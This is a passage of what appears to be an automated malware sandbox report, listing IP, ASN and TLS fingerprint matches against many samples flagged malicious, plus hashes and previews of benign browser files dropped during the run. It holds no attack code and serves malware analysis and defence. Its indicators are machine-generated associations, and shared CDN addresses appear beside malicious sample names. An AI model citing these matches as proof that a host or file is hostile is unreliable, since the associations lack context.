                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                mon44_cr.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                mon41_cr.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                mon4498.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                e888888888.dllGet hashmaliciousBrowse
                                                                                • 23.218.208.23
                                                                                1233.exeGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                Server.exeGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                2200.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                mon48_cr.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                • 92.122.253.103
                                                                                Wh102yYa..dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                • 2.20.86.97
                                                                                8.prtyok.dllGet hashmaliciousBrowse
                                                                                • 104.84.56.24
                                                                                SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                • 104.84.56.24
                                                                                tls13.taboola.map.fastly.netSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon44_cr.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon41_cr.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon4498.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                e888888888.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                1233.exeGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                Server.exeGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                2200.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon48_cr.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                8.prtyok.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Variant.Razy.840176.14264.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                contextual.media.netSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                mon44_cr.dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                mon41_cr.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                mon4498.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                e888888888.dllGet hashmaliciousBrowse
                                                                                • 23.218.208.23
                                                                                1233.exeGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                Server.exeGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                2200.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                mon48_cr.dllGet hashmaliciousBrowse
                                                                                • 184.30.24.22
                                                                                SecuriteInfo.com.Generic.mg.5db96940e68acc98.dllGet hashmaliciousBrowse
                                                                                • 92.122.253.103
                                                                                Wh102yYa..dllGet hashmaliciousBrowse
                                                                                • 23.210.250.97
                                                                                SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dllGet hashmaliciousBrowse
                                                                                • 2.20.86.97
                                                                                8.prtyok.dllGet hashmaliciousBrowse
                                                                                • 104.84.56.24
                                                                                SecuriteInfo.com.Variant.Bulz.349310.9384.dllGet hashmaliciousBrowse
                                                                                • 104.84.56.24

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                CLOUDFLARENETUSSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                B62672021 PRETORIA.docGet hashmaliciousBrowse
                                                                                • 104.21.45.223
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                RFQ.xlsGet hashmaliciousBrowse
                                                                                • 104.20.139.65
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                IVJq3tVi96.exeGet hashmaliciousBrowse
                                                                                • 104.21.19.200
                                                                                Doc0538-2-21.xlsGet hashmaliciousBrowse
                                                                                • 104.20.138.65
                                                                                COTIZACI#U00d3N.exeGet hashmaliciousBrowse
                                                                                • 104.21.19.200
                                                                                REQUEST FOR QOUTATION.exeGet hashmaliciousBrowse
                                                                                • 104.21.19.200
                                                                                DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                                                                                • 162.159.133.233
                                                                                Shipping Documents Original BL, Invoice & Packing List.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                aS94x3Qp1s.exeGet hashmaliciousBrowse
                                                                                • 104.21.19.200
                                                                                Purchase Order.xlsxGet hashmaliciousBrowse
                                                                                • 172.67.8.238
                                                                                attched file.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                Factura.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                CT_0059361.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                scan-021521DHL delivery.docGet hashmaliciousBrowse
                                                                                • 104.21.19.200
                                                                                FASTLYUSSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                7eec14e7cec4dc93fbf53e08998b2340.exeGet hashmaliciousBrowse
                                                                                • 185.199.111.133
                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                ransomware.exeGet hashmaliciousBrowse
                                                                                • 151.101.66.159
                                                                                07oof4WcEB.exeGet hashmaliciousBrowse
                                                                                • 185.199.110.133
                                                                                03728d6617cd13b19bd69625f7ead202.exeGet hashmaliciousBrowse
                                                                                • 185.199.111.133
                                                                                PO 20191003.exeGet hashmaliciousBrowse
                                                                                • 185.199.111.133
                                                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon44_cr.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon41_cr.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                mon4498.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                e888888888.dllGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                Project.pdf.exeGet hashmaliciousBrowse
                                                                                • 151.101.1.195
                                                                                1233.exeGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                Server.exeGet hashmaliciousBrowse
                                                                                • 151.101.1.44
                                                                                via-1.3.1-win.exeGet hashmaliciousBrowse
                                                                                • 185.199.111.154
                                                                                GOOGLE-AS-APGoogleAsiaPacificPteLtdSGSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 34.65.144.159
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 34.65.144.159
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 34.65.144.159
                                                                                CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                                                                                • 34.66.107.230
                                                                                CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                                                                                • 34.66.107.230
                                                                                SecuriteInfo.com.BehavesLike.Win32.Emotet.jc.exeGet hashmaliciousBrowse
                                                                                • 34.65.61.179
                                                                                CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                                                                                • 34.66.107.230
                                                                                CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                                                                                • 34.66.107.230
                                                                                CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                                                                                • 34.66.107.230
                                                                                CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                                                                                • 34.66.107.230
                                                                                oHqMFmPndx.exeGet hashmaliciousBrowse
                                                                                • 34.119.201.254
                                                                                Documentation__EG382U8V.docGet hashmaliciousBrowse
                                                                                • 34.67.99.22
                                                                                #Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htmGet hashmaliciousBrowse
                                                                                • 34.101.72.248
                                                                                #Ud83c#Udfb6 03 November, 2020 prodriguez@fnbsm.com.wavv.htmGet hashmaliciousBrowse
                                                                                • 34.101.72.248
                                                                                http://49.120.66.34.bc.googleusercontent.com/osh?email=bob@microsoft.comGet hashmaliciousBrowse
                                                                                • 34.66.120.49
                                                                                SecuriteInfo.com.Heur.13242.docGet hashmaliciousBrowse
                                                                                • 34.67.97.45
                                                                                8845_2020_09_29.docGet hashmaliciousBrowse
                                                                                • 34.67.97.45
                                                                                QgpyVFbQ7w.exeGet hashmaliciousBrowse
                                                                                • 34.65.231.1
                                                                                qySMTADEjr.exeGet hashmaliciousBrowse
                                                                                • 34.65.231.1
                                                                                SecuriteInfo.com.Trojan.Siggen10.9113.10424.exeGet hashmaliciousBrowse
                                                                                • 34.65.231.1

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                9e10692f1b7f78228b2d4e424db3a98cSecuriteInfo.com.Generic.mg.f77e7bd43f365593.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                NJPcHPuRcG.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                Ne6A4k8vK6.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                13xakh1PtD.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                DUcKsYsyX0.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                7eec14e7cec4dc93fbf53e08998b2340.exeGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                RI51uAIUyL.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                L257MJZ0TP.htmGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                brewin-02-02-21 Statement_763108amFtZXMubXV0aW1lcg==.htmGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                658908343Bel.htmlGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                P178979.htmGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                03728d6617cd13b19bd69625f7ead202.exeGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                PO 20191003.exeGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Trojan.GenericKD.36134277.347.exeGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exeGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                mon44_cr.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                mon41_cr.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                mon4498.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44
                                                                                e888888888.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                • 151.101.1.44

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):13
                                                                                Entropy (8bit):2.469670487371862
                                                                                Encrypted:false
                                                                                SSDEEP:3:D90aKb:JFKb
                                                                                MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                Malicious:false
                                                                                Preview: <root></root>
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):3456
                                                                                Entropy (8bit):4.918959247422732
                                                                                Encrypted:false
                                                                                SSDEEP:96:5hhuhzzsnzz8z333mmmmmV4TmV4TmVBjCmVBjC9mVBjCmVBjCYmVBjCo:9FlFCT
                                                                                MD5:914C0B18BC03E6C4E22926FB7F3D0934
                                                                                SHA1:4907DA2B852B908C8BB4C83DC66675B45B1A625E
                                                                                SHA-256:70B5FE8346DDE5AEC2B183A40A78D504793508355B423A2611A47EA95C247B34
                                                                                SHA-512:B153CD4D11F48FB3C4261BC0D8F1E4C22C46D75CFB67E81DC523CD78A226821D38CAE1EDAF9F84F6F4ACABD038CC5B66BEB8BB9675C4381C37A74541A354F3C4
                                                                                Malicious:false
                                                                                Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /><item name="mntest" value="mntest" ltime="1425692880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425532880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /><item name="mntest" value="mntest" ltime="1425892880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /><item name="mntest" value="mntest" ltime="1428972880" htime="30868470" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1425732880" htime="30868470" /></root><ro
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8F499AAE-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):106280
                                                                                Entropy (8bit):2.2643158250238193
                                                                                Encrypted:false
                                                                                SSDEEP:3072:Bo04F02T0ST0lT0BT0NT0290UT0qT0l90W90Z90gP0zT0xT0PP0TP0MP0/PO8PO/:Bo04F02T0ST0lT0BT0NT0290UT0qT0le
                                                                                MD5:60A4C05540136C1EBE77D6DF45863775
                                                                                SHA1:33AED884DB09782252EAC8B7682B7476E2E9298C
                                                                                SHA-256:EA1DAF5A07B167DC44F76911741018ECF8AC16542FCBF852DCDFD000C3D072DE
                                                                                SHA-512:0C8DF9733C60F4759C4FDA0F0B5A4A7B57F2A3BAF636D10C5FFD7BAF7B40F6D2AB4CB33B3382E3FCD0AA531517C101A86E1E84AA4D6C07CABEDF812DBA40AF38
                                                                                Malicious:false
                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8F499AB0-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):194958
                                                                                Entropy (8bit):3.5847035569441683
                                                                                Encrypted:false
                                                                                SSDEEP:3072:4Z/2BfcYmu5kLTzGtLZ/2Bfc/mu5kLTzGt5:xai
                                                                                MD5:EACFFBFFDFE1B8289692FF8AFA5D1BA7
                                                                                SHA1:1934377F000A44A16524ECBC2D50FC0653EC51F3
                                                                                SHA-256:0E85426046C7545253C9AC3E2749DAD549756C7630DA6C6A2DF2793979CADAED
                                                                                SHA-512:572A0B34F7BECDA1AE706B66E6EBD8BB0744226D31B57A63AC61E0E18A7EA6AB14FFCDABA6ED5954701F6C5050344E3C05DFDB9F83F2C832D32198096DE18680
                                                                                Malicious:false
                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E3407C-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):28144
                                                                                Entropy (8bit):1.9161627712752582
                                                                                Encrypted:false
                                                                                SSDEEP:96:rCZlQ567BSTjR2yW7M3ZS5NWBJs8ESm1S5NWXO5NWBJs8EiA:rCZlQ567kTjR2yW7M3ZXcSm1/jciA
                                                                                MD5:54B1BD50F47CC224E53759BA4FBD617F
                                                                                SHA1:1878BF1E537FBE26D6D5D25BBB9A77DF3897CF6C
                                                                                SHA-256:DB7C51AC1C7C4B2350076BAE6D0D07737A562D6F3A179AEA9764BCDFDB2E6FAD
                                                                                SHA-512:784388EC585F94364E182BB22CD3A68361E2CA2707755D64703ECD54FF81DE97DD788341F2C2816AEA5A89FD271EDBA106643C4818109FC7E7607FF435B22608
                                                                                Malicious:false
                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E3407E-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):28152
                                                                                Entropy (8bit):1.9173576656143714
                                                                                Encrypted:false
                                                                                SSDEEP:96:roZ7Qv6tBSfjZ2+WYMIx/N4yhYVZjD2ks/Nf14yhYVZjCA:roZ7Qv6tkfjZ2+WYMIxuySjKlAySjCA
                                                                                MD5:E8BEE74CC905B34ABAEF35501069223B
                                                                                SHA1:7C537AA9214D4CB66B5C2184A1911A92FDEC761E
                                                                                SHA-256:AF40EE958AC5E55BBD0B9F240FD3FE4783FBA184BA3B60A8591E6A3E12A7E4F2
                                                                                SHA-512:0FCCA420620998691DFBF37B6A847DC24B8C90E7EC95D275D60023551598623BB9EEFBE18D5F838308CD68F190CFA76CBD291B5E4E79EE2415040C312A3D23D5
                                                                                Malicious:false
                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A5E34080-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):28696
                                                                                Entropy (8bit):1.9162549240413231
                                                                                Encrypted:false
                                                                                SSDEEP:192:rgZDQL6mkljeq2soWI9MjsR8PktsBtEM8BPktsBIr:rQMOnBQw9IsE4PGE4g
                                                                                MD5:B67F2B77E558B521016FFBC1D4340618
                                                                                SHA1:1D6B1B06A421F244A0767A65842A35E37BC0FE24
                                                                                SHA-256:442A06440C8DC96604C47EB641D8D2052C4CEADC83B9AAF12CA4F584961C2D53
                                                                                SHA-512:1C9A645EC2E02C9F045BEB1805FA0A4AC67C400ADBA463CADEA49B01E20F7F8F7249B4E7B7A736855B1574037375EBEF7BB51FE022878449FA85F26B81C72CCD
                                                                                Malicious:false
                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B1D25056-6FE9-11EB-90EB-ECF4BBEA1588}.dat
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:Microsoft Word Document
                                                                                Category:dropped
                                                                                Size (bytes):19032
                                                                                Entropy (8bit):1.5825707586616589
                                                                                Encrypted:false
                                                                                SSDEEP:48:Iw91GcprXOGwpakG4pQYGrapbSfGQpKvG7HpRATGIpX2bGApm:r9rZXmQU6mBSJA+TUFag
                                                                                MD5:142AE331E82FFFCB2EA09C49CDF053A2
                                                                                SHA1:88B2A08DB3F97D2171734ADB536D17D8CB0864D3
                                                                                SHA-256:23F2C0326A4B51AC31AD4C7C8E9687A3162E9CDD4790E126CF1B7BD4F6B45375
                                                                                SHA-512:4B3F84CADFF8C1F167964A3F10B4E32306BD90AE7BF863081B5CE4E1081711FFBA3B54EA1180D7739B1644719EF76614990ACA9CE1E134A5CD064F414E693384
                                                                                Malicious:false
                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):656
                                                                                Entropy (8bit):5.089202842179241
                                                                                Encrypted:false
                                                                                SSDEEP:12:TMHdNMNxOEYQ+vbQ+gnWimI002EtM3MHdNMNxOEYQ+vbwnWimI00OYGVbkEtMb:2d6NxOBQ+jQ+gSZHKd6NxOBQ+jwSZ7Y3
                                                                                MD5:7D700464A669B453CF31B76C82DACD86
                                                                                SHA1:99503B8BFF4B7380C6C51423C52FDB4D6135FE33
                                                                                SHA-256:D361DB4B64482C20FCBA6E1C4209598BDD9D284511B9890056AA9884002E94F5
                                                                                SHA-512:3B2F99CD15A05FB2C8685BEC1C9275F757623630C590E8B10FDB8967CE8B0163BE0F14BED0D84A89A3F0A223494386318C4DDBBDAAA5156865DB9EA85332E5A0
                                                                                Malicious:false
                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x6614ba5d,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6614ba5d,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):653
                                                                                Entropy (8bit):5.115202570823737
                                                                                Encrypted:false
                                                                                SSDEEP:12:TMHdNMNxe2kYn2bnRnWimI002EtM3MHdNMNxe2kYn2bnRnWimI00OYGkak6EtMb:2d6NxrhWRSZHKd6NxrhWRSZ7Yza7b
                                                                                MD5:C4FF038286D2F359E706C246B1F4010A
                                                                                SHA1:F0D77F4F18B73162B2A012F1AA00F648DA72CF99
                                                                                SHA-256:5B89D0B13F81081E8FA57EA7058E93D0F31ACE483C7C38BB6E7AB15A25DA2A9F
                                                                                SHA-512:270417E2BDDE2A186285A6E578A02C8C56F91E018A2B95343EE23F6E1FEB0960AB84B8779EB8A3834716582A791F326B580A51D89C694EF5BD7EE997549F32F9
                                                                                Malicious:false
                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x660d9379,0x01d703f6</date><accdate>0x660d9379,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x660d9379,0x01d703f6</date><accdate>0x660d9379,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):662
                                                                                Entropy (8bit):5.0781693515825586
                                                                                Encrypted:false
                                                                                SSDEEP:12:TMHdNMNxvLYfbwnWimI002EtM3MHdNMNxvLYfbwnWimI00OYGmZEtMb:2d6NxvMzwSZHKd6NxvMzwSZ7Yjb
                                                                                MD5:4A9B691C563FFDE74E028DF1042282BB
                                                                                SHA1:06776F3FF211931B29426A6798E2DD708E2D40F5
                                                                                SHA-256:06F1B046037120DDDDDF59FC7E9D88E8A007F00E2B1B3889BBA1CBCE87565F12
                                                                                SHA-512:33448B7679B000A7CC1E7AB436990C58D6E4D78FCE3721BC3D4C79890A38B69148A109BC7C126454FCBB7FB9A89E33A1C1BF1C5663AD7C783F78D32D897D8135
                                                                                Malicious:false
                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x66171ccb,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x66171ccb,0x01d703f6</date><accdate>0x66171ccb,0x01d703f6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):647
                                                                                Entropy (8bit):5.1330177419790575
                                                                                Encrypted:false
